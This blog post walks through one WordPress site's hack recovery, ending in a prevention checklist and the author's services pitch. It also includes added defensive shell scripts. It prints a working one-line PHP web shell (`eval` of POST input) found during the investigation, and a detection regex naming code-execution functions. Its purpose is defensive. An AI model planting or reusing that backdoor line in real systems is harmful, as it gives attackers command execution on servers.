The 2 AM Phone Call That Changed How I Handle Every WordPress Site Forever
I’ll never forget the 2 AM phone call.
The ringtone jolted me from a dead sleep — the kind of deep sleep you only get after a 14-hour workday. My first thought was that someone had died. The voice on the other end was trembling.
“Our website… it’s gone. Just… gone. Customers are calling saying they’re being redirected to some… some pharmacy site. Google is showing a red warning. Please. I don’t know what to do.”
It was a local business owner — a small e-commerce store that sold handmade goods. They were a family operation. Three employees. Two young kids at home for the owner. And now, their entire digital storefront had been ripped apart by someone on the other side of the world.
I swung my legs out of bed, opened my laptop, and typed their domain.
What I saw made my stomach drop.
The Scene of the Crime
The homepage was defaced. Instead of their beautiful product photography and warm welcome message, there was a black screen with green text that read:
“Hacked by CyberGhost — Your security is a joke.”
Beneath it, a looping animation of skulls. Classy.
I checked Google. Typed “site:theirwebsite.com” into the search bar. The results showed page titles filled with Viagra keywords, casino spam, and links to counterfeit handbags. Their carefully crafted SEO was buried under digital garbage.
Then I clicked their own link.
Redirect. Within two seconds, I was sent to a sketchy domain selling fake luxury watches. The kind of site that probably steals credit cards the moment you enter them.
My heart was racing. This wasn’t just vandalism. This was theft of trust.
The client, let’s call him “Mike” (not his real name), was still on the phone. I could hear his wife crying in the background.
“We have orders to ship tomorrow. Our customer email list. Our product photos. Do you have a backup?”
I took a breath.
“We’re going to fix this. But I need you to listen carefully and do exactly what I say.”
The Hard Truth About What We Were Up Against
Here’s the part I had to admit to myself — and eventually to Mike. This hack was almost entirely preventable.
Their WordPress site was running a theme that hadn’t been updated in two years. A plugin called “Revolution Slider” (a notorious target for hackers, with old and widely exploited vulnerabilities) was three versions behind. The admin password? “admin123.” I wish I were joking.
No security plugin. No firewall. Backups? They thought their hosting company handled that automatically. They didn’t.
I had warned Mike three months earlier about updating his plugins. He’d said, “Let’s wait until after the holiday rush.”
The holiday rush never came. Instead, we got this.
Lesson #1 burned into my brain that night: Security isn’t a “someday” task. It’s a “today or you’ll regret it” task.
Phase 1: Stop the Bleeding
Panic is the real enemy in a hack. It makes you do stupid things like delete everything or click random “clean my site” buttons from Google search results.
I forced myself to slow down and follow a containment protocol I’d developed after previous incidents.
🚨 Immediate Actions (First 30 Minutes)
- Put the site in maintenance mode. I edited the .htaccess file to send all traffic to a simple “Site Down for Maintenance” page. This stopped visitors from seeing the redirects and getting infected themselves. Serve that page with a 503 status rather than a 200 or a redirect, so search engines treat it as a temporary outage instead of indexing the placeholder in place of the site.
- Changed EVERY password. Hosting account. FTP/SFTP. Database. WordPress admin. Even the client’s email (in case it was compromised). Every single one became a 20-character random string stored in a password manager. Do this from a machine you trust, not the client’s possibly infected PC, and use SFTP rather than plain FTP, which sends the brand-new password across the wire in clear text.
- Called the hosting provider. I asked them to temporarily disable any outgoing connections from the server (to stop the malware from “phoning home” to its command center) and to provide me with raw access logs from the past 30 days.
- Created a “crime scene” backup. Before deleting or cleaning anything, I downloaded a complete copy of all files and the database, keeping file timestamps intact: those timestamps are the timeline the investigation is built on. Ideally this snapshot is taken even before the .htaccess edit. It preserves evidence in case we need it later.
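The containment steps above (snapshot first, then maintenance mode) as a shell script, added here as an example; it is not part of the original write-up. It assumes Apache with .htaccess overrides enabled, a static /maintenance.html that you have uploaded yourself, that you run it over SSH on the host, and that the database dump (for example mysqldump --single-transaction) goes into the same evidence directory separately. The IP address and paths are placeholders.

```shell
#!/bin/sh
# Added example, not the article's own script: containment from Phase 1.
#   snapshot_site              "crime scene" copy first: tar (timestamps intact) + SHA-256 manifest
#   write_maintenance_htaccess 503 for everyone except the responder's IP
# Assumptions: Apache with .htaccess overrides enabled, a static /maintenance.html you
# uploaded yourself, and a separate database dump into the same evidence directory.
set -eu

# snapshot_site SITE_ROOT OUT_DIR -> prints the timestamp used in the file names.
# Run this BEFORE editing or deleting anything, .htaccess included: file mtimes are
# the timeline the investigation will be built on.
snapshot_site() {
    site_root=$1
    out_dir=$2
    stamp=$(date -u +%Y%m%dT%H%M%SZ)
    mkdir -p "$out_dir"
    # tar stores permissions and modification times by default.
    tar -C "$site_root" -czf "$out_dir/site-$stamp.tar.gz" .
    # One hash per file, sorted, so any later copy can be checked with sha256sum -c.
    ( cd "$site_root" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k 2 ) \
        > "$out_dir/manifest-$stamp.sha256"
    # Hash the archive itself so the copy handed to the host (or a lawyer) is verifiable.
    ( cd "$out_dir" && sha256sum "site-$stamp.tar.gz" > "site-$stamp.tar.gz.sha256" )
    printf '%s\n' "$stamp"
}

# write_maintenance_htaccess SITE_ROOT ALLOWED_IP
# Keeps the attacker's .htaccess as evidence (.htaccess.compromised), then answers
# 503 to every client except ALLOWED_IP. A 503 tells search engines "temporary
# outage"; a 200 placeholder or a redirect would get indexed in place of the site.
write_maintenance_htaccess() {
    site_root=$1
    allowed_ip=$2
    ip_re=$(printf '%s' "$allowed_ip" | sed 's/\./\\./g')   # match the IP literally
    if [ -f "$site_root/.htaccess" ] && [ ! -f "$site_root/.htaccess.compromised" ]; then
        mv "$site_root/.htaccess" "$site_root/.htaccess.compromised"
    fi
    cat > "$site_root/.htaccess" <<EOF
# Maintenance mode written during incident response. Remove after cleanup.
ErrorDocument 503 /maintenance.html
RewriteEngine On
RewriteCond %{REMOTE_ADDR} !^${ip_re}\$
RewriteCond %{REQUEST_URI} !^/maintenance\\.html\$
RewriteRule ^ - [R=503,L]
EOF
}

# Usage (on the host, over SSH):
#   stamp=$(snapshot_site /var/www/html /root/evidence)
#   write_maintenance_htaccess /var/www/html 203.0.113.5
```

The manifest is what lets you prove later that the evidence copy was not altered: `sha256sum -c manifest-<stamp>.sha256` run inside the web root must report no changes.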
The client’s tone shifted slightly. Having a clear, step-by-step plan calmed both of us down. Chaos thrives on uncertainty. Methodical action kills it.
Phase 2: The Investigation (Where Did They Get In?)
With the site offline, I started hunting for the entry point. This is like detective work — looking for the open window the burglar crawled through.
Step 1: Run Automated Scanners
I installed Wordfence (the free version) and ran a full scan. It flagged 47 “suspicious” files. Then I ran Sucuri SiteCheck online. It confirmed the malware was still present.
But scanners miss things. Always. So I rolled up my sleeves and got manual.
Step 2: Manual File Inspection via FTP
I connected via FTP and started browsing the file structure. Here’s what I found:
The /uploads/ folder (2023 directory):
A file named wp-update.php that shouldn't exist. Inside, base64-encoded gibberish. Decoded, it was a web shell—a backdoor that lets attackers run commands on the server like they own it. That a PHP file under /uploads/ could run at all is a hardening gap in its own right: the uploads tree should hold data, never executable code.
The /themes/ folder (active theme):
The 404.php file had been rewritten. Instead of a friendly error page, it contained obfuscated code that triggered the redirect only for search-engine crawlers and a random share of ordinary visitors, never for logged-in users. This kind of cloaking is why the owner saw a normal site while Google and customers did not.
The /plugins/ folder:
A directory named wp-cache-warmup that wasn't a real plugin. Inside, a file called index.php with a single line: <?php @eval($_POST['cmd']); ?>
That tiny line was the master key to their entire server.
Lesson #2: Attackers hide backdoors in plain sight. They name files to look legitimate (wp-config-backup.php, admin-ajax-new.php) and tuck them into folders you never check.
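The manual inspection above, turned into a repeatable triage script. This is an added example and not the author's own tooling. It is a triage aid, not a verdict: every path it prints still needs a human to open the file, and WordPress core is skipped on purpose because core legitimately contains base64_decode; core is checked instead against the official release with `wp core verify-checksums`. It assumes GNU grep, find and base64 (`base64 -d`; older macOS uses `-D`); the sample tree in the usage comment is constructed.

```shell
#!/bin/sh
# Added example, not the article's own script: the Phase 2 file hunt as a script.
#   hunt_backdoors SITE_ROOT      prints "reason<TAB>path" for the three findings above
#   recently_changed SITE_ROOT N  files modified in the last N days (the timeline)
#   decode_b64_payloads FILE      decodes the base64_decode('...') literals in a file
# Assumes GNU userland (grep -oE, find -path, base64 -d).
set -eu

# Execution-from-input and decoder calls that almost never belong in a plugin or theme.
# Legitimate code occasionally uses one of them, which is why this is triage, not proof.
SUSPICIOUS_RE='eval\(|assert\(|base64_decode\(|gzinflate\(|gzuncompress\(|str_rot13\(|create_function\(|shell_exec\(|passthru\(|popen\(|proc_open\('

# Prefix every input line with a reason, tab-separated.
tag() { awk -v r="$1" '{ print r "\t" $0 }'; }

hunt_backdoors() {
    site_root=$1
    # 1. PHP anywhere under uploads (the wp-update.php web shell). Nothing executable belongs here.
    find "$site_root/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' -o -name '*.phar' \) 2>/dev/null \
        | tag uploads-php
    # 2. Must-use plugins: loaded on every request, no activation, not in the normal plugin list.
    find "$site_root/wp-content/mu-plugins" -type f -name '*.php' 2>/dev/null \
        | tag mu-plugin
    # 3. Suspicious calls in every PHP file outside core (the fake plugin, the rewritten 404.php).
    #    Core is excluded here and verified separately with: wp core verify-checksums
    find "$site_root" -type f -name '*.php' \
        ! -path "$site_root/wp-admin/*" ! -path "$site_root/wp-includes/*" \
        -exec grep -lE "$SUSPICIOUS_RE" {} + 2>/dev/null \
        | tag pattern
}

# Everything touched in the last N days, with owner, size and mtime.
# Cross-check the dates against the hosting provider's access logs.
recently_changed() {
    find "$1" -type f -mtime "-$2" -exec ls -l {} + 2>/dev/null
}

# Turn the "gibberish" into readable PHP. Nested layers: feed the output back in.
decode_b64_payloads() {
    grep -oE "base64_decode\(['\"][A-Za-z0-9+/=]+['\"]\)" "$1" \
        | sed -E "s/^base64_decode\(['\"]//; s/['\"]\)\$//" \
        | while IFS= read -r blob; do
            printf '%s' "$blob" | base64 -d 2>/dev/null || true
            printf '\n'
        done
}

# Usage (on the host):
#   hunt_backdoors /var/www/html | sort -u
#   recently_changed /var/www/html 30
#   decode_b64_payloads /var/www/html/wp-content/uploads/2023/wp-update.php
```

Run `hunt_backdoors` before any cleanup and keep its output with the evidence: it is the list of what you removed and why, which is exactly what the review request in Phase 4 has to describe.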
Step 3: Database Deep Dive (phpMyAdmin)
The database was even worse.
I logged into phpMyAdmin and checked the wp_users table. Two unknown admin users—hack3r and support_team—had been added with full privileges.
The wp_options table had a new entry: wprss_redirect_url containing the pharmacy spam site.
The wp_posts table had hundreds of draft posts filled with gambling keywords and hidden links. Drafts are never shown to anonymous visitors, so the site owner never saw them in the front end; the cloaked code in the theme is what served spam to crawlers, and the titles Google indexed came from there.
That’s why Google blacklisted them. Search engines treat content served only to crawlers, and hidden spam in general, as deceptive.
Phase 3: The Cleanup (Surgery Time)
Now came the tedious part — removing the infection without breaking the site.
🔧 Cleaning Checklist (What Actually Worked)
- Deleted ALL suspicious files manually. I went through every flagged file Wordfence found, plus the ones I discovered manually. Any file I couldn’t verify as legitimate was moved to a “quarantine” folder on my local machine (not deleted immediately — just in case).
- Reinstalled WordPress from scratch. Downloaded a fresh copy of the latest WordPress version from wordpress.org. Deleted the old wp-admin and wp-includes folders entirely, then uploaded the new ones, and replaced the core files in the site root as well (everything except wp-config.php and wp-content). Then I confirmed with `wp core verify-checksums` that nothing differed from the official release.
- Reinstalled EVERY plugin and theme clean. Deleted all plugins (even the legitimate ones) and reinstalled them from the official WordPress repository. For premium plugins, I downloaded fresh copies from the original vendor. Same for the theme.
- Cleaned the database via phpMyAdmin. Removed the fake admin users. Deleted the spam post entries (using a SQL query: DELETE FROM wp_posts WHERE post_content LIKE '%casino%'). Run the matching SELECT first and read the results, because a LIKE '%casino%' match also catches any legitimate post that happens to mention the word; afterwards delete the orphaned wp_postmeta rows for those post IDs. Removed malicious entries from wp_options, and checked the cron option and any unfamiliar autoloaded options while I was there, not just the redirect URL.
- Removed suspicious .htaccess rules. Hackers love hiding redirects in .htaccess. I deleted the existing file and generated a clean one by saving WordPress's permalinks settings again.
- Reset all secret keys and salts. I generated new authentication keys in wp-config.php (WordPress provides a generator for this at api.wordpress.org/secret-key/1.1/salt/). This forces all active login sessions to expire immediately, including the attacker’s. I also changed the database password in wp-config.php, since anyone with a web shell could have read the old one.
The entire cleanup took about 8 hours spread across two days. I worked in focused sprints, taking breaks to avoid fatigue-fueled mistakes.
Phase 4: The Recovery (Getting Back in Google’s Good Graces)
With the site clean and hardened, I brought it back online. The maintenance mode page came down. The real homepage returned.
But Google still showed the red warning.
This is the part most people forget: cleaning your site isn’t enough. You have to tell Google you cleaned it.
📝 Google Blacklist Removal Request
- Verified site ownership in Google Search Console. (If you haven’t done this, do it NOW. Don’t wait for a hack.)
- Clicked “Security Issues” in the left sidebar. Google showed: “Harmful site detected — pages that navigate away from the site”
- Clicked “Request Review.” This opens a form where you explain what you fixed.
I wrote a detailed, honest explanation:
“The site was compromised via an outdated plugin (Revolution Slider). Attackers injected a backdoor in /uploads/ and added spam content to the database. We have: removed all malicious files, reinstalled WordPress core, updated all plugins/themes, changed all passwords, installed a firewall, and rotated all secret keys. Please review.”
Then we waited.
Day 1: No change.
Day 2: Still red. The client was getting anxious.
Day 3 (morning): Still red.
Day 3 (evening): I refreshed Search Console… and saw “No issues detected.”
I clicked the homepage. It loaded clean. No redirect. No skulls. No pharmacy spam.
I called Mike.
“Check your site.”
Silence. Then a shaky breath.
“It’s back. Oh my God. It’s actually back.”
What I Learned (And What You Should Steal)
That 2 AM phone call changed how I handle every WordPress site I touch. Here’s what I now do without exception — and what you should too.
🔐 The Non-Negotiable Security Checklist
Action / Frequency / Why It Matters
- Daily automated backups, stored OFF-SERVER (like Google Drive or AWS). Daily. When a hack happens, you restore from a clean backup. Without it, you’re manually scrubbing malware. Keep several days of history: a backup taken after the compromise is just a copy of the infection.
- Update WordPress, plugins, themes. Weekly, and sooner for any plugin with a published security fix. The great majority of WordPress hacks come through known, already-patched flaws in plugins and themes. One week of delay is all a botnet needs.
- Remove unused plugins/themes. Monthly. Every inactive plugin is still code on disk that can be loaded or exploited. Delete it.
- Strong, unique passwords + 2FA. Once (enforce for all users). “admin123” isn’t a password. It’s an invitation.
- Security plugin (Wordfence or Sucuri). Always active. Automated scanning catches what you miss.
- Web Application Firewall (WAF). Always active. Blocks malicious traffic BEFORE it reaches your site.
- Change default login URL (from /wp-admin to something custom). Once. Cuts down the automated brute-force noise against /wp-login.php, but it is obscurity, not protection: keep 2FA and login rate-limiting in place, and remember that xmlrpc.php is a second login path that needs blocking or limiting too.
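Three of the hardening steps this incident calls for, as a shell script: no PHP execution in the uploads tree (where the web shell sat), DISALLOW_FILE_EDIT so a stolen admin login cannot rewrite theme files such as 404.php from the dashboard, and a wp-config.php that other accounts on a shared host cannot read. This is an added example, not the author's own script. It assumes Apache 2.4 with .htaccess overrides allowed for the uploads directory (on nginx, use a location block that returns 403 for \.php$ under uploads instead); the SITE_ROOT paths are placeholders.

```shell
#!/bin/sh
# Added example, not the article's own script: three hardening steps aimed at the
# doors this incident walked through.
#   harden_uploads       no PHP execution under wp-content/uploads (where the web shell sat)
#   disable_file_editor  DISALLOW_FILE_EDIT, so a stolen admin login cannot rewrite
#                        theme files such as 404.php from the dashboard
#   lock_wp_config       wp-config.php readable only by its owner
# Assumptions: Apache 2.4 with .htaccess overrides allowed for the uploads directory;
# SITE_ROOT paths are examples.
set -eu

# harden_uploads SITE_ROOT
harden_uploads() {
    uploads=$1/wp-content/uploads
    mkdir -p "$uploads"
    cat > "$uploads/.htaccess" <<'EOF'
# Uploads are data, never code: refuse to serve anything PHP-like from this tree.
<FilesMatch "\.(php|phtml|php[0-9]|phar)$">
    Require all denied
</FilesMatch>
EOF
}

# disable_file_editor SITE_ROOT
# Inserts the define just before wp-settings.php is loaded (it must come before that
# line to take effect). Idempotent, so it is safe to run on every deploy.
disable_file_editor() {
    cfg=$1/wp-config.php
    if grep -q 'DISALLOW_FILE_EDIT' "$cfg"; then
        return 0
    fi
    tmp=$(mktemp)
    awk -v line="define( 'DISALLOW_FILE_EDIT', true );" '
        /wp-settings\.php/ && !done { print line; done = 1 }
        { print }
        END { if (!done) print line }
    ' "$cfg" > "$tmp"
    cat "$tmp" > "$cfg"   # cat, not mv: keeps the file's owner and mode
    rm -f "$tmp"
}

# lock_wp_config SITE_ROOT
# A web shell could read wp-config.php, which is why the DB password was rotated;
# 600 stops other accounts on a shared host from reading it too. Hosts that run PHP
# as a different user than the file owner need 640 with that user's group instead.
lock_wp_config() {
    chmod 600 "$1/wp-config.php"
}

# Usage (on the host):
#   harden_uploads /var/www/html && disable_file_editor /var/www/html && lock_wp_config /var/www/html
```

After running it, request any .php URL under /wp-content/uploads/ in a browser: a 403 confirms the override is honoured; a served script means AllowOverride is off and the rule has to go into the server configuration instead.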
The Hardest Conversation
The most painful part of this entire ordeal wasn’t the technical cleanup. It was explaining to Mike that the hack was completely preventable.
“I should have listened about the updates,” he said. “I thought it wouldn’t happen to us.”
That’s the thing about cybersecurity. Everyone thinks they’re too small, too unimportant, too “nobody-wants-to-hack-us” to be a target.
But most hacks aren’t targeted. They’re automated. Bots scan the entire internet 24/7, looking for vulnerable sites. They don’t care if you’re a local bakery or a multinational bank. They find an open door, they walk through it, and they plant their garbage.
Mike’s site wasn’t targeted. It was opportunistic.
He’s on a strict update schedule now. Weekly. No excuses. And he has off-server backups for the first time.
Final Thoughts: Don’t Panic. Follow the Steps.
If your WordPress site gets hacked tonight (and I hope it doesn’t), here’s what I want you to remember:
- Breathe. Panic leads to bad decisions.
- Take the site offline (maintenance mode or .htaccess redirect).
- Change ALL passwords before you do anything else.
- Create a “crime scene” backup before cleaning.
- Scan + manually inspect files (don’t trust scanners alone).
- Reinstall WordPress core, plugins, and themes clean.
- Clean the database (phpMyAdmin is your friend).
- Request Google review via Search Console.
- Implement prevention so it never happens again.
And if you’re reading this before you’ve been hacked? Go update your plugins right now. Change your admin password. Set up backups.
That 2 AM phone call? It could have been a 2 PM email saying “Thanks for keeping us secure.”
Choose the email.
Key Takeaways Box
✅ Backups save lives. Store them off-server (Google Drive, Dropbox, AWS).
✅ Updates aren’t optional. Schedule them weekly.
✅ Remove what you don’t use. Old plugins/themes are liabilities.
✅ Use a security plugin + firewall. Free versions are better than nothing.
✅ Monitor Google Search Console. You’ll know about blacklisting immediately.
✅ Don’t wait for a crisis. Prevention costs far less than recovery.
Have a hacked site right now? Need help but don’t want to go through this alone?
I’m Shamir Ajmir Khan — a Cybersecurity Specialist who cleans hacked WordPress sites and keeps them clean. You can reach me here. Don’t panic. Just reach out. We’ll fix it together.